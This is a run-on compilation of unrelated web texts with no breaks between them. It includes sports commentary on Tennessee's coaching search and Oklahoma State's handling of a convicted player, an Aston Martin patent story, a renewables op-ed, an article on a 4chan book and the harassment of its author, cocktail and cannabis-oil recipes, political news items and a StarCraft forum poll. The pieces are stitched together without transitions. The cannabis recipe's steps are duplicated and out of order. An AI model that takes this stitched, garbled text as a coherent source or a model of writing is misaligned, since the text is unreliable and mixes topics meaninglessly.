The “ fury out there ” argument was expressed by , among others , Mark Zuckerberg of Facebook , who was trying to rebut criticisms that his site 's tolerance for serving up popular , profitable , and wholly fictitious reports as “ news ” had skewed voters ' perceptions of reality , mainly toward the right . It did n't matter that people were learning online that Hillary Clinton was about to die of Parkinson 's disease , or that violent crime was very high by historic standards when it was in fact very low . In the end , Zuckerberg said , voters “ made decisions based on their lived experience. ” Of course people must have been furious about their lived experiences . How else could they have voted for a man many of them viewed negatively , according to exit polls , and even as unqualified for the job ? To paraphrase Trump 's famous campaign appeal to African American voters : With their lives and communities in such ruin , what the hell did they have to lose ?
The Tennessee-Mike Gundy romance came to an abrupt end Tuesday night , sources confirmed to Yahoo Sports .
Was it due to a new Big Orange backlash ?
Scroll to continue with content Ad
More internet outrage aimed at the next candidate to become the football coach of the Volunteers ?
Another populist uprising , this one decrying Gundy 's supportive stance toward someone he recruited and coached at Oklahoma State who was accused and ultimately convicted of sexual assault ?
No . You did n't hear the backlash . You did n't see the internet outrage . You did n't experience the uprising . None of that happened .
It 's fair to wonder why . It 's fair to wonder why the explosive details of Chris Collins ' career at Oklahoma State did n't become an incendiary issue Tuesday — to wonder about the dramatic difference between the angry Greg Schiano populist revolt in Knoxville on Sunday and the giddy Mike Gundy revival two days later .
Other than career winning percentage , of course . Schiano 's is .504 as a college head coach , Gundy 's .681 . That 's a big difference to keep in mind when considering the vastly different treatment the two received .
Tennessee fans reacted with unprecedented force and fury Sunday to the news that their school was in the process of hiring Schiano as the next football coach of the Volunteers . They drove the Ohio State defensive coordinator out of town before he even got to town .
Tennessee turned its eyes to Oklahoma State 's Mike Gundy after the Greg Schiano fiasco on Sunday . ( Getty )
Story continues
In the end , the deal-breaking rallying cry from the fans was this : We want a coach without a whiff of scandalous baggage . The baggage they assigned Schiano came from a hearsay allegation in a 2015 deposition of former Penn State assistant coach Mike McQueary , wherein McQueary said he heard that Schiano had information about convicted pedophile Jerry Sandusky behaving improperly with children when they were on staff together in the 1990s .
That allegation was never proven , and no charges were brought against Schiano . He was never sued in civil court . The attorney general who vigorously investigated the Sandusky scandal never went after Schiano . Ohio State vetted the available information thoroughly when the allegation arose in 2016 and found it to be unsubstantiated .
Despite all that , the snippet of McQueary testimony was ignited into the firebrand of righteousness that Tennessee fans used to blow up the hiring of a football coach and emasculate the school 's athletic director . For some , the indignation may have been sincere .
But for others , the Sandusky association became a convenient cover for rebelling against a coach with a middling career record . It 's quite easy to suspect that a lot of people smeared Schiano 's name and reputation and then shrugged it off as collateral damage in the frenzied search for a winning coach who can drag the program out of a decade-long doldrums .
But let 's take Tennessee fans at their word . They say they do n't want a coach with even a hint of tolerance for sexual assault ? Then why did n't they have anything to say about Collins ' time playing for Gundy at Oklahoma State ?
On Nov. 6 , 2007 , three days after playing for Oklahoma State in a 38-35 loss to Texas , Collins pleaded guilty to a charge of aggravated sexual assault of a child . He admitted to having sex with a 12-year-old girl in 2004 , when he was 17 . A day later he was convicted and sentenced to five years in prison , though the jury recommended he serve probation instead .
Collins said he was told the girl was 16 years old at the time of two consensual sexual encounters in his hometown of Texarkana , Texas . The girl denied telling Collins that .
Because of the charge against him , Collins sat out his senior year of football at Texas High School in Texarkana . A scholarship offer from the University of Texas was rescinded . Despite all that , new Oklahoma State head coach Mike Gundy gave Collins a scholarship and he played as a true freshman for the Cowboys .
Collins was an immediate standout at Oklahoma State . He was the team 's second-leading tackler as a freshman before being sidelined with a knee injury at midseason . He was also a regular contributor as a sophomore — until the November day he left campus to go home and plead guilty to felony sexual assault .
Collins was suspended upon his return to school , but not immediately dismissed . That produced an uproar of its own , before he eventually was dismissed . At the time , some wondered why he was ever allowed to become a Cowboy .
“ This is stuff that happens in third-world countries , ” Kathy Redmond told The New York Times in 2007 . “ These are war crimes . I truly hope that people in Oklahoma and the entire United States decide they 're not willing to support the Oklahoma State athletic department . ”
Redmond , who founded the National Coalition Against Violent Athletes , has become a nationally known figure for her work in educating college athletic programs on violence against women . Ten years later , she still is unsparing in her critique of Gundy .
“ Think about the risk to the student population , ” Redmond told Yahoo Sports on Tuesday . “ It absolutely was child rape . … To me [ allowing Collins to play ] goes beyond a lapse in judgement . That 's very intentional . To me , that 's a major character issue of a coach .
“ For Gundy to have done it , it tells you what the priority was . It was winning . ”
At 7 p.m . ET Tuesday , Yahoo Sports reached out to Tennessee for comment on Gundy and the Collins story .
Athletic director John Currie , university public relations and athletics public relations all declined comment when reached by Yahoo Sports . A little over two hours later , Brett McMurphy reported that a potential deal between Tennessee and Gundy was off .
At the time of his conviction , several people at Oklahoma State vouched for Collins , saying he was a model citizen while in Stillwater , and that the school researched his background closely before offering him a scholarship . Others argued that Collins believed the girl was 16 and that his naïve decision to plead guilty forced a conviction that otherwise never would have happened .
But when it comes to Chris Collins , the bottom line is this : Mike Gundy brought a player accused of aggravated sexual assault into his program . And none of the very vocal fans at Tennessee seemed interested in talking about that Tuesday , as opposed to the pitchforks-and-torches mobilization against Schiano on Sunday .
Gundy assuredly is the big winner Volunteers fans craved , and he 's done it at a school always fighting uphill against Oklahoma and Texas . He would have been a big hire if winning is the bottom line .
But Tennessee fans have said this week very loudly , if not altogether convincingly , that character matters to them .
What would have been the statement if their school hired Gundy ? More pertinently , what did the criticism-free enthusiasm for Gundy from the fan base say ?
“ If you are a good enough coach , if you bring championships , not a lot of people care how they came , ” Redmond said Tuesday . “ My hope is that there are so many other coaches to choose from . I hope the students and talk show hosts in Tennessee recognize what kind of culture and baggage [ Gundy ] brings with him . ”
Yahoo Sports ' Pete Thamel contributed to this story .
More from Yahoo Sports :
• Curry defended by wife after apparent fan snub
• Trump again hammers NFL : ‘ American public is fed up '
• Abdul-Jabbar : LiAngelo Ball stained my legacy
• NFL comes down hard on two of its star players
AutoGuide.com
A patent application discovered by AutoGuide.com could reveal the design for the next Aston Martin Vantage .
The filings , which were submitted with Japan 's patent office this week , show a design sketch for a small , two-door , front engine Aston Martin sports car . To us that only means one thing : it 's the new Vantage . It 's impossible to say for sure and often times these patent filings never materialize into real-world product , but the current Vantage has been with us since 2005 , so the clock is ticking for Aston to finalize a design for the new model .
Aston seems keen on this particular design , having first filed a patent application with the European patent office for it around this time last year . The design is reminiscent of other recent Aston models , with a frowning front-end that reminds us of the track-only Vulcan and thin taillights similar to those seen on the DB11 . A vented hood an aggressive rear diffuser are evidence of its sporting aspirations .
SEE ALSO : New Aston Martin Vantage V8 Caught Testing at the Nurburgring
The next-generation Vantage will ride on a shortened version of the DB11 's lightweight aluminum platform . It will also share an engine range with the larger grand tourer , with the V12 Vantage using the DB11 's twin-turbocharged 5.2-liter V12 and the V8 version using its AMG-sourced 4.0-liter twin-turbo V8 . Both automatic and manual transmissions will likely be on offer , with Aston Martin CEO Andy Palmer once telling Car & Driver the brand “ would love to be the last car manufacturer providing stick shifts in the U.S . ”
An official debut date for the next-gen Vantage is not yet known , but according to Autocar , it could be unveiled later this year . No matter when it 's destined to arrive , it seems likely that this patent filing has given us a pre-screening of its exterior styling .
Meibi Project is now holding a collaborative photo-painting exhibition in Nagoya , Japan from 14 March to 11 April 2015 . The photos are the portrait works of the Indonesian photographer and Meibi Project 's founder Agro Rachmatullah , whose aim is to introduce more about the personalities , dreams , and achievements of Japanese women through the medium of art . The paintings are sent by various collaborating artists from outside Japan .
Since starting Meibi Project in 2011 , we received many fanarts from around the world . We are really happy that our portraits inspire people to create more art , so this time we want to return the favor by giving artists all around the world the chance to exhibit their drawings in Japan . For the first stage of this exhibition we received 68 submissions with various styles ranging from anime to the Japanese traditional ukiyo-e . If you like to draw , you can still participate for the second part of the exhibition by sending your art here !
Here are the 11 paintings that were selected for the first part :
Each photographer interprets the same scene and object differently by using a different focal length , composition , and camera settings . It 's really interesting to see how the resulting photo gets reinterpreted differently by various artists through their drawings .
If you want your painting to be exhibited in Japan , you can still submit for the second part here ! We will post a more thorough coverage of the event at a later time . For those who did n't get selected this time , we will post the images on our Facebook and Twitter page . Once again , congratulations on all who passed !
Meibi Photography Exhibition “ E ni Narimasu ? ? ”
Place : Yamate Cafe , 1-17-1 Yamate-dori , Showa-ku , Nagoya , Japan
Date : March 14-April 11 2015 ( except Sunday )
Time : 11:00-16:00
In our ongoing series on nuclear energy , Terry Leach takes up the cause for renewables .
Geoff Russell has copped a bit of flak lately for his pro-nuclear writings , as has Chris Graham for publishing him . While Chris has published two anti-nuke rebuttals of Geoff 's views , I 'd like to take another tack .
I 'm a renewable energy advocate , not an anti-nuclear zealot . I think Geoff 's got some valid points regarding the demonization of nuclear power , while we all seem relatively comfortable with energy and transport systems that are killing and maiming thousands of Australians each year . Globally , we 're talking millions of victims , annually .
It 's Geoff 's continual misinformation about renewable energy that pisses me off .
But first , to those people who have chosen no withdraw their support for New Matilda because of the publication of Geoff 's views . That is like calling for the abolition of the ABC because you do n't like Counterpoint on Radio National .
Geoff is an intelligent and decent man who cares deeply about humanity , animals and the environment . In regard to renewable energy , I 'm sure he 's wrong . To understand how decent people may hold views diametrically opposed to your own , Dr Lissa Johnson has written sublime articles on system justification and cognitive dissonance . So when reading contributions from me and from Geoff , consider how psychology is influencing our views and your reaction to them .
Those two articles motivated me to go from being a reader to a subscriber . If the ( additional ) price to pay to have access to Dr Johnson 's writings ( and the many other worthy contributors ) is to have to put up with Geoff 's nonsense , I 'm in . I strongly encourage you to subscribe .
Now , time to sink the slipper . Geoff and the other pro-nuke advocates are wasting their time promoting a technology that will never be adopted in Australia . In 10 years renewable energy in South Australia has gone from almost zero to over 40 per cent and still climbing rapidly . The ACT will have achieved 100 per cent renewable energy by 2020 .
This is despite federal policy being contested and uncertain . In the time it would take to build a nuclear reactor , renewable energy will be supplying the vast bulk of Australia 's electricity generation , and well on the way to powering our transport system .
While I 'm confident renewable technology will eventually provide 100 per cent global carbon neutral energy , we have a very short time to mitigate the damage we 're doing to the global climate . Change can be uncomfortable and scary , which is why vested interests can so easily sway public opinion . Having pro-nuke advocates saying that we must adopt nuclear power because renewables do n't cut the mustard is just encouraging people to stick with the status quo .
The fossil fuel lobby is laughing at us just as the monarchists laughed at the republicans arguing over the model of appointing a president .
I do n't mind Geoff arguing for nuclear power , I just wish he 'd stop cherry-picking the facts to suit his argument ( the anti-nuke lobby are just as bad ) . Take for example this effort in response to the SA wide power blackout in September 2016 .
Geoff writes : “ In 2012 , Electranet estimated that the grid could handle a 450 megawatt ( MW ) loss without crashing… . So how much power did SA lose when those big towers collapsed ? A mere 315 MW . ”
Geoff does n't link to the source , but I 'm fairly sure that Electranet was talking just about the sudden loss of generation , not combined with utter devastation of a significant part of the transmission network .
Geoff 's thesis is that our electricity network needs the inertia of heavy turbines to be stable . As wind turbines are n't directly connected to the grid like fossil fuel turbines , they do n't count . So we need nuclear driven turbines to provide carbon free system inertia .
This is putting the cart before the horse . Our network developed with inherent inertia . This inertia can keep the network going when supply is unexpectedly withdrawn , for a little while . A very little while , just one second ! But our network engineers have taken advantage of this feature to design a load shedding system that within that one second blacks out some customers to keep the remainder of the grid going .
This system in SA worked fine the previous four times in 17 years that the Heywood Interconnector tripped . On three of those occasions the coal powered Northern Power Station tripped first ( so much for the reliability of steam driven turbines ! ) . On only one occasion in 17 years was the Heywood Interconnector itself to blame , blacking out 20 per cent of the state for nine minutes . But that blackout continued for a further 26 minutes , due to a malfunctioning fossil fuel generator preventing re-connection .
The only time that significant wind generation was withdrawn unexpectedly , South Australia was suffering the most extreme weather in the history of the grid . Twenty-two transmission towers collapsed exacerbating the problem of literally tens of thousands of lightning strikes .
On this occasion the very high Rate Of Change Of Frequency ( ROCOF ) also caused the remaining fossil fuel generators to trip producing a state-wide black out . And that went on much longer than necessary due to the failure of both of the fossil fuel generators that were paid to provide emergency re-start services .
So how do we make sure this never happens again ? Well we could just put up with this every half century or so . Or we could build our network towers to stay upright in extreme weather . Or we could spend a fortune subsidising polluting fossil fuel generators or nuclear reactors to keep the entire grid working for just one second . Or we could instead install equipment that can respond much quicker than any turbine can to maintain voltage and frequency ; that can even out supply and demand ; and reduce the exorbitant cost of our network .
They are called batteries , and this is exactly what AEMO and Electranet were already considering installing . This was the cheapest option to address known issues in the north of SA regarding maintaining voltages and frequency . Batteries are the only technology that can go from soaking up excess network generation to providing significant power in milliseconds . Inertia works against you when you 're trying to get those turbines moving faster .
We have an awful lot of fossil fuel generation sitting idle ready for those rare demand peaks . Some new gas generators only operate for as little as 3 per cent of the time . It makes a lot of sense to substitute batteries that not only provide this peaking power when required , but can provide immediate emergency power , frequency control , voltage control and avoidance of network upgrades . This is already happening in the United States , not as some sort of push for renewable energy , but as a rational decision to provide a reliable network at the cheapest possible price .
Geoff is a repeat offender when it comes to misrepresenting the facts about our network . Take this effort regarding the supposed inability of the interconnectors to make a significant contribution when solar and wind are not producing , such as on a clear and frosty winter morning .
Geoff writes : “ So we have a peak demand of just over three billion watts and for parts of winter our wind farms can supply just 75 million watts. ” Geoff fails to mention that peak demand is in summer , so winter wind farm generation is a touch irrelevant .
And he doubles up with this : “ Currently the SA interconnections can supply less than 1/4 of our peak demand . So when our wind farms are supplying just 75 mega watts and our interconnecters are supplying 680 mega watts , then where should the other couple of billion watts come from ? ”
Er , Geoff , the peak demand occurs late afternoon in summer during a heat wave , where wind and solar are making a significant contribution . Peak demand is decreasing and occurring later in the afternoon due to self-consumption of rooftop PV . Oh , and the interconnectors ' capacity is currently 870 MW , not the quoted 650MW . As well , there are proposals to increase total interconnection capacity to somewhere between 1300MW to 2220 MW .
Geoff then goes on to argue that geographic distribution of wind turbines does n't reduce the variability of wind power , as there are many days when the entire NEM has low contribution from wind . Wrong again Geoff , geographic distribution WILL reduce the problem .
With the vast bulk of national wind generation capacity currently installed in South Australia and nearby Victoria , then of course there will be a high degree of correlation of all wind power with SA 's wind power . We do n't have idiots in charge of the energy transition ; new turbines are being planned in areas that have low correlation with the existing wind turbines , and even installing turbines that are more effective at harnessing low wind speeds . Wind farm owners want the greatest financial return so naturally they are now looking further afield .
Geoff then criticises the potential of pumped hydro , arguing that we would need massive dams causing great environmental destruction and greenhouse gas emissions . He ca n't seem to get away from his fixation with large centralised generation .
There are many sites already identified that can take advantage of the frequent occasions that will arise when renewable energy exceeds demand . It makes sense to locate these as close to the generation and the demand to avoid losses in transmission . ARENA is currently funding a project to map suitable locations so that the best sites can be developed as cheaply as possible .
I could go on and on picking the many errors and misleading bias in Geoff 's writings , but it is tedious to do and tedious to read .
South Australia has shown that we can get to 45 per cent without any storage . With the NEM able to transport generation across most of the economy , and with the significant existing hydro storage in the eastern states , we can get to about 80 per cent without additional storage and without significant curtailment of excess renewable generation .
Neither of the major parties is expecting this to happen until well after 2030 . I suspect that storage will become more urgent as the uptake of renewables and cost reductions have consistently beaten predictions .
It should be noted that new wind and solar capacity is now cheaper to build than new fossil fuel generation and much cheaper than nuclear . The renewable generation revolution is now unstoppable , we just need it to happen very quickly .
But the major issue for fossil fuel generators , and the nuclear wannabes , is the cost of the national grid that they are totally dependent upon , which ( in SA at least ) makes up more than half the retail cost of electricity . Grid utilisation is decreasing as more and more rooftop solar is installed . And even more change is on the way .
Less than 12 months ago Tesla shook up the storage industry with the Powerwall 1.0 , forcing competitors to match their price . The Powerwall 2.0 has just halved the price per KWH , and it is now on the threshold of making economic sense for households to store their rooftop PV generation .
When they halve the price again , the entire economic model of centralised grid and generation collapses .
So Geoff , keep writing your futile pro-nuke nonsense if you wish , the fossil fuel lobby are cheering you on . But get your facts straight before you start criticising renewables .
Cole Stryker 's new book on 4chan and Anonymous , called Epic Win for Anonymous , was only published on September 1—but the death threats , pizza deliveries , and magazine subscriptions are already rolling in . Stryker waded into 4chan 's notorious /b/ board to announce his book 's publication ; the very first response was `` Kindly kill yourself immediately . '' Anons have tweeted his home address , even down to the correct apartment number . And he has been signed up for every spam e-mail list on the planet .
The first rule of /b/ is that one does n't talk about /b/ , so writing a book about 4chan was unlikely to be received well , whatever its message . But Stryker takes it all in stride , telling me , `` In order for Anonymous to intimidate you , you have to give them the tools to find out information . '' He has no naked pictures floating about , no secret blog in which he confesses his love for Cabbage Patch dolls . `` The worst they can do is send me garbage in the mail , '' he says .
And they have . While 4channers and Anons like to believe they 're a `` shadowy group of merciless bastards , '' in Stryker 's words , that illusion is shattered a bit when someone takes readers on an ethnographic journey into their heart of darkness . Stryker understands the impulse and compares it to the anger you might feel after a favorite indie band signs with a major label and your little sister plasters their posters across her room .
`` I 'm actually pretty sympathetic toward Anonymous in the book , '' he says .
The pure love of creation
That 's not to downplay some of the truly heinous acts of harrassment in Anonymous history . Stryker actually began the book trying to answer a key question : `` Why would somebody want to be a part of this ? '' 4chan 's /b/ board , in particular , has been known for child pornography , adult pornography , targeting young kids for harassment , anti-social behavior of all kinds , hate speech , and just about anything else one might imagine .
But it has also been one of the strongest meme-creation points on the 'Net , spawning everything from `` lolcats '' to catchphrases like `` epic win ! '' to Rickrolling . It has done so with a purity of motive , too ; unlike sites like Reddit , 4chan has no karma points or reputation system . Users almost all post anonymously and many share pictures they have created . To Stryker , 4chan shows the thrill of pure creativity , the `` joy of creating something interesting or funny '' for others to see .
While 4chan may well live on for quite some time , Stryker has more skepticism towards Anonymous , which emerged from within 4chan 's ranks . Because the movement has no real direction , it can be hard to sustain any particular political program ; all it takes is some 14-year old with a plan to attack some harmless organization to discredit the group in the public 's eyes . `` Anyone can take up the flag of Anonymous , '' says Stryker . `` I do n't think they 're ever going to be a serious force in terms of political activism—they 're just too conflicted in what they want to accomplish . ''
Whatever the future holds for 4chan and Anonymous , both groups had better prepare for more book-length treatments of their activities . The self-published /b/ : The Random Anonymity Culture And A New Direction For Anonymous appeared last year , Stryker 's Epic Win has just appeared , and other books ( and book proposals ) are in the pipeline ; I was even asked about writing a history of Anonymous in the aftermath of the group 's hack into security vendor HBGary earlier this year .
Anonymous/4chan are getting the sociological treatment that , a few years back , was largely reserved for Second Life . Books like Coming of Age in Second Life : An Anthropologist Explores the Virtually Human , The Making of Second Life : Notes from the New World , and I , Avatar : The Culture and Consequences of Having a Second Life came and went . Will the fascination with 4chan and Anonymous last longer ?
If you follow me on Instagram , you probably noticed that I 've been playing around with Barsmith Shandy lately . This recipe is a follow-up post to my original review of the product . While its primary function is to add to a beer to make a shandy , I could n't help but dabble around with some cocktails . I went down four different paths with several iterations of each until finally landing on this recipe . I find gin to be the perfect companion with its juniper and citrus playing perfectly with the hops and grapefruit found in the Shandy . Barsmith 's Shandy is the sweetening element in this cocktail , and the hops and grapefruit flavors are pronounced enough that you are able to get the flavor without making a syrupy concoction . That said , the cocktail still needed some additional acid to introduce some balance . I chose to use acid phosphate over grapefruit juice to introduce some additional acid for two reasons . I wanted a neutral flavor and wanted the presentation to remain crystal clear . However , if you do n't have acid phosphate on hand , I 'm sure grapefruit juice would work fine .
– Cheers !
The Lucent Endeavor Print Cook Time 2 mins Total Time 2 mins Author : Andrew Saliga Recipe Type : Cocktail Serves : 1 Ingredients 1.25 ounces dry vermouth
1 ounce Loyal gin
.75 ounce Barsmith Shandy
4 dashes acid phosphate
2 dashes grapefruit bitters Instructions Combine all ingredients in a mixing glass and stir until chilled . Strain into a rocks glass filled with ice , and garnish with an expressed grapefruit peel . 3.5.3208
Additional Resources :
Review : Barsmith Shandy
Barsmith
LOYAL Gin
A dramatic few hours in the Capitol building in Madison . A Dane County court judge , John C. Albert , all Capitol access restrictions must be lifted by the Department of Administration . This allows open access to the Capitol for the public , including protesters , during business hours . Albert gave a deadline of March 8 at 8am ( next Monday ) for full implementation ; if Gov . Walker and the DOA do not comply , they can be held in contempt of court . Albert also said in his ruling that there have been , based on his investigation , “ no injuries or damage to personal or government property , ” which is a direct shot at the bogus claim of millions of dollars in damages .
However , Albert 's ruling only applies to business hours . Therefore , the Capitol police moved to shut down the building today at 6:00pm . The DOA has the authority to clear out protesters in the Capitol after business hours .
The attorney in the case explained the ruling to the protesters in the Rotunda .
Just after the ruling , protesters found an opening at the State Street entrance to the Capitol . Capitol Police Chief Charles Tubbs then told them they had to leave after close of business hours or face arrest . After a few minutes , most protesters left . A few have stayed behind , waiting to read the judge 's order before leaving the Capitol .
For the most part , however , the protesters are claiming victory over Walker and the DOA 's lockdown of the past several days . Here 's the statement from the Wisconsin AFL-CIO :
This evening the court of law ruled that the Wisconsin State Capitol MUST remain open to its people . The Capitol is going to resume business hours and protestors will be asked to leave every night . However , by law the Capitol doors must re-open at 8:00 am each and every morning so that Wisconsin residents can excercise their first amendment rights without undue interference from their Governor . This ruling is a huge victory for Wisconsin and an enormous defeat for Gov . Scott Walker and his unconstitutional power grab . Despite Scott Walker 's draconian attempts to take his ‘ baseball bat ' to the First Amendment rights of those who disagree with his extreme agenda , he has failed yet again to silence the voices of the 74 % of Wisconsinites who oppose his budget repair bill .
Thomas Bird of the Capitol City Leadership Committee said to me via email , “ We are leaving peacefully now . We won the lawsuit . ”
Basically , what it means is that the protesters can not occupy the building overnight , but they can not be denied access during business hours . They see this as a victory for the moral authority of their side , and I see no reason to doubt that .
Besides , by night they can stay outside by the palm trees .
Rick Perry at a Senate Energy and Natural Resources Committee hearing on his nomination for energy secretary in January . ( Michael Reynolds/European Pressphoto Agency )
The Energy Department is changing its website to cut down on Obama-era language touting renewable energy sources as a climate-friendly replacement for fossil fuels , according to reports from an environmental watchdog group .
Whereas the site formerly touted technologies such as wind , solar and geothermal energy as a replacement for sources such as coal , oil and natural gas , the department 's website now focuses on renewable energy 's potential to create jobs , according to the Environmental Data and Governance Initiative , a network of academics and nonprofit groups that has been monitoring federal websites .
The reports , compiled by the EDGI 's website tracking team , describe changes made during the past few months to Web pages for the Energy Department 's Bioenergy Technologies Office , Wind Energy Technologies Office and Vehicle Technologies Office , all of which fall under the agency 's Office of Energy Efficiency and Renewable Energy — an office that has been targeted for deep cuts by proposed administration budgets . These offices are tasked with the research , development and deployment of renewable energy and sustainable transportation .
Under the Obama administration , these offices ' websites emphasized the importance of cutting down on U.S. carbon emissions and reducing the nation 's dependence on fossil fuels — a message in keeping with President Barack Obama 's push to address climate change .
But with the Trump administration de-emphasizing climate change and looking to promote climate-friendly and carbon-intensive energy sources — an agenda that coincides with a broad attempt to eliminate regulations on fossil fuels and particularly on coal — the priorities outlined on these office 's Web pages have been shifting since the inauguration .
For each of the three offices , EDGI reports a change in the emphasis of renewable fuels or energy sources as a replacement for fossil fuels . On the Vehicle Technologies Office 's “ Working With Us ” page , for instance , the office 's mission statement previously included the line , “ reduce the use of petroleum. ” Sometime around the end of January and beginning of February , that line changed to “ strengthen U.S. energy security , economic vitality , and quality of life , ” according to the report .
Website monitoring efforts at EDGI have been keeping track of the recent changes , using a form of tracking software .
( Environmental Data and Governance Initiative
Similarly , the website for the Bioenergy Technologies Office previously included a line suggesting that its efforts were “ helping to replace the whole barrel of oil. ” In March , that sentence was replaced with a line suggesting that the office is “ supporting the development of bioproducts , which enable biofuels , since the production of bioproducts relies on much of the same feedstocks , infrastructure , and technologies that are central to biofuel production . ”
( Environmental Data and Governance Initiative )
In turn , the reports note a shift to an increased stress on the economic payoffs of advancing these technologies , also in keeping with the administration 's emphasis on jobs creation .
The Wind Energy Technologies site , for instance , recently added a line pointing out that “ wind energy currently supports more than 100,000 U.S. jobs , and wind turbine technician is the nation 's fastest-growing occupation . According to industry experts , the U.S. wind industry is expected to drive over $ 85 billion in economic activity from 2017 to 2020 , and wind-related employment is expected to reach 248,000 jobs in all 50 states by 2020 . ”
Together , the changes collectively downplay the climate benefits of each form of technology and distance the agency from the idea that they might be used to reduce dependence on fossil fuels , instead emphasizing their economic advantages . It 's a move that 's well in line with the Trump administration 's generally dismissive attitude toward the issue of climate change .
The Energy Department did not immediately reply to a request for comment on the reasons for these changes . However , these are far from the first changes to be made to federal websites concerning climate and the environment under the Trump administration , nor is it uncommon for incoming administrations to change their websites to reflect the new president 's priorities .
Multiple climate-related reports disappeared from the State Department website in January . And in the same month , employees of the Environmental Protection Agency indicated that the Trump administration was planning to remove certain sections on climate change from the agency 's website , although the administration later backed away from those plans .
For people who like to make goodies ever so often this is a great way to get a good body high using only stems and seeds .
Ingredients
~ a zone of stems and seeds ( if you are truly a stoner this can be from about a months worth of smoke )
~ 1 cup of canola or cooking oil
Directions
Cook for about an hour and a half . Stirring frequently . Then sift the oil into a mason jar to store for up to one month . Poor the oil into a small pot . Mix in the seeds and stems . You can also add a little shake if you like . Cook on the lowest possible setting making sure to not let it boil . If it boils turn your heat all the way down.Cook for about an hour and a half . Stirring frequently . Then sift the oil into a mason jar to store for up to one month .
Portugal might be one of the few European countries where Bitcoin has n't really turned into a trend . Actually , most people do n't even know what cryptocurrency is and there are no reports of any merchants accepting BTC . Nevertheless , the country will soon witness the arrival of its first Bitcoin ATM .
Yet , ‘ arrival ' might be a strong word . The Lamassu machine wo n't have to travel a lot of miles , since the devices are being produced in the northern region of the country , where the ATM will be installed . The American company responsible for the machine decided to manufacture the ATM in Portugal since the beginning of the process . Even its designer , who talked to 99Bitcoins a while ago , is Portuguese .
The Bitcoin exchange device , which allows the users to quickly buy BTC using fiat currency , will be located in Matosinhos , near the more famous city of Porto . However , the specific location of the ATM is not known yet .
Back in July 2013 , the designer Cláudio Castro said that , “ although this kind of currency is almost unknown in Portugal , there is already a lot of information available ” .
At the time , he told 99Bitcoins that “ Portugal 's ignorance towards this kind of currency ” left the country “ one step behind ” in the game . “ However , I believe that things will change in the next year ( … ) I believe that Portuguese people will , eventually , start to use Bitcoin . Over the years , Portugal has always been a distrustful country towards new things , but sooner or later we always yield to new trends ” , he added . And he was apparently right .
The Portuguese manufacturer that is producing the ATMs is keeping its identity anonymous . Still , Lamassu has announced that 120 machines are currently being built in the European country , after the first 40 units concluded in 2013 .
TemujinGK Profile Blog Joined March 2011 Jordan 478 Posts Last Edited : 2011-08-22 21:01:01 # 1
Some days ago I private messaged EGalex who was kind enough to respond to my question of in essence : on a scale of 1-10 how would you rank Destiny as a player . * *
* * I 'd like to take this moment to thank EGalex for responding promptly and honestly regarding his personal thoughts on the player formerly known as ROOT_Destiny . It is imperative to note that he was not asked in to respond in any official capacity as a member of EG just asked for his thoughts . Keep this in mind while posting . Thanks guys : D
To this question EGalex responded :
In essence , as one might deduce from the title , this thread is regarding the player formerly known as ROOT_Destiny.Some days ago I private messaged EGalex who was kind enough to respond to my question of in essence : on a scale of 1-10 how would you rank Destiny as a player . * * * * I 'd like to take this moment to thank EGalex for responding promptly and honestly regarding his personal thoughts on the player formerly known as ROOT_Destiny . It is imperative to note that he was not asked in to respond in any official capacity as a member of EG just asked for his thoughts . Keep this in mind while posting . Thanks guys : DTo this question EGalex responded :
Overall , I 'd rank him at about a 4 .
We take a variety of factors into account when recruiting , including :
1 ) Major LAN/Online Tournament Results
2 ) Work Ethic/Natural Talent/Potential for Improvement
3 ) Marketability/Personality
4 ) Established Fan Base
I think that Destiny is quite strong in category 4 , and probably slightly above average in category 2 . In categories 1 and 3 , I 'd give him very low ratings .
I agree that his style is innovative , and he should be applauded for developing such a huge fan base and streaming following . However , he currently has no impressive results to speak of in my eyes , really ( practice games , show matches , and mid-tier tournaments just do n't matter , unfortunately ) . Also , his image and personality really hold him back from becoming more of a mainstream star .
I think that if he can post an impressive result at a large tournament , it 'll turn some heads .
Of note , my original PM to EGalex also included a clause about whether or not Destiny would be a good pickup for Evil Geniuses , hence the seemingly non-sequitor answer .
So I think that it is a fair assessment that Destiny has not gotten wildly impressive large tournament results ( MLG , etc . ) but I was wondering if people agreed that the GSPA is a mid-tier tournament , or if the wins over ST_Bomber and ST_Ace were not indicative of ability . So basically as I see it—in recent weeks—Destiny has these successes ( if you have more please respond and they will be added to the OP ) :
2-0 Victory over ST_Bomber one of the top Terran players in the world .
Memorable point : this series included an almost hour long massive macro game on shakuras plateau .
2-0 Victory over ST_Ace , a high level korean protoss .
Memorable point : this series included a hidden spire muta build , demonstrating a different style from a player frequently thought of as ‘ one dimentional ' for his infestor play .
Addition : Destiny Beat NEXpuzzle 4-1 ( thank you to pikachu856 for reminding me )
3-2 Victory over FnaticMSI.Rain .
Memorable point : Was a showmatch for $ 100 dollars , part of the ‘ Destiny v. Korea ' series on stim.tv
4-3 Victory over EG.Incontrol
Memorable point : Infestor play dominated the series , only one game ( on shakuras plateau ) included significant muta play . This potentially playes into the idea of a ‘ one dimensional ' style from Destiny ? Also of note , Incontrol was criticized by some for his cannon rush on shakuras leading to a cancelled natural , and his huge blink stalker all-in ( as defined by the lack of an expansion behind the attack ) on metalopolis .
He is also ranked in Grandmaster League in North America as well as Upper Master League in Korea .
Comparably important Destiny has had these failures : ( again if you have more please post and I will add to the OP )
2-0 Loss to mid-to-upper-tier Sixjax_Vibe in the GSPA
2-3 Loss to EG.HuK ( Then Liquid'HuK ) < -- tear much ?
Memorable Point : As reported by EG.Incontrol on State of The Game Destiny won the macro oriented games of the series whilst HuK took the shorter games .
A less than optimal ( frankly poor ) showing at MLG anaheim , knocking out notables such as TT1 , but falling mid way through the losers bracket to a non-aligned open bracket player .
EG.Incontrol has noted that he believes , and he is not alone , that the Infestor is a 'broken ' or 'imbalanced ' unit that allows Destiny to beat someone who is `` 4-5 times better '' than him ( EG.HuK ) . I am only using this specific player as an example as he is one of the most outspoken members of the SC2 community
0-3 loss to Grubby in $ 100 dollar showmatch
Destiny has had a plethora of successes and failures before these , and I 'm sure he will have plenty of both after these , but let us restrict our discussion to the present time .
Taking all of the above , and your own knowledge into account my questions are as follows :
Poll : 1 . On a scale of 1-10 where would you rank Destiny 's skill .
7 ( 521 )
23 %
6 ( 517 )
22 %
5 ( 364 )
16 %
8 ( 240 )
10 %
1 ( 217 )
9 %
4 ( 191 )
8 %
3 ( 111 )
5 %
10 ( 84 )
4 %
2 ( 34 )
1 %
9 ( 30 )
1 %
